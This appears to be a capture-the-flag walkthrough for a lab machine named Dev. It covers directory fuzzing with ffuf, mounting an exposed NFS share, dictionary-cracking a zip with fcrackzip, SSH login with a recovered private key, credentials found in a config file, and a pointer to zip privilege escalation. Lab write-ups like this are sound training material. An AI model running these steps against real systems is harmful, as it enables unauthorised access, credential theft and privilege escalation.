DEV

Normal scans first

found apache server which goes to Bold installation on IP:

http://192.168.218.132/

and PHP is running on port 8080 so we can:

http://192.168.218.132:8080/

Not much info there, we can dirbuster or ffuf for subdir:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.218.132/FUZZ

to check mount on server we can:

showmount -e 192.168.218.132

which gives us back the /srv/nfs we scanned earlier in nmap.

we can make a mount folder for dev:

sudo mkdir /mnt/dev

and then download that file:

sudo mount -t nfs 192.168.218.132:/srv/nfs /mnt/dev

then go to folder:

cd /mnt/dev
ls

the zip file we downloaded is password protected. We can crack it using fcrack:

Install:

sudo apt install fcrackzip

Use:

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip

-v verbose

-u unzip

-D dictionary attack

-p /usr/share/wordlists/rockyou.txt specifying which wordlist/dictionary

last is zip name

found password: java101

unzipping with the cracked psw:

sudo unzip save.zip
#when prompted for password:
java101

see what they have:

ls
cat todo.txt

We can use the id_rsa file (private key) to SSH into server:

ssh -i id_rsa jp@192.168.218.132

jp isn’t a user, we need to find out his actual username!

the scan on 8080 did bring back BoltWire.

the scan also did bring back /app/ directory which gave us:

config.yml which included:

username: bolt
password: I_love_java

After checking BoltWire version, we were able to reach list of users using the exploit which gave us:

jeanpaul

We can check the same command again for password reuse:

After gaining access, we run:

history
sudo -l

and we see we have sudo for zip

How do we privesc from zip (or anything that isn’t a user)?

https://gtfobins.github.io/gtfobins/zip/

this website!